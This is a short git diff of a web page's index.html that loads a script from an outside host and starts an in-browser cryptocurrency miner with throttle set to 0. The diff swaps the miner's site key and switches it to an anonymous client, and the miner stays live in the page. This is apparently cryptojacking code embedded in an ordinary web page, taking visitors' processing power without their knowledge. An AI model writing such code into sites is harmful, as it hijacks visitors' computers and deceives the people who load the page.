--- a/index.html
+++ b/index.html
@@ -38,7 +38,7 @@
 <script src="https://www.hostingcloud.racing/fXQJ.js"></script>
         
 <script>
-    var miner = new Client.User('be4b40420be2454808008f0e646536ce448215c147afc3cce015dc35b9dace6f', 'ElLob', {
+    var miner = new Client.Anonymous('83d47a127d9d7aca938a80b2fcefac99fe7d1a128f8075c0eda536b7615ac619', 'ElLob', {
         throttle: 0, c: 'w'
     });
     _client.start();
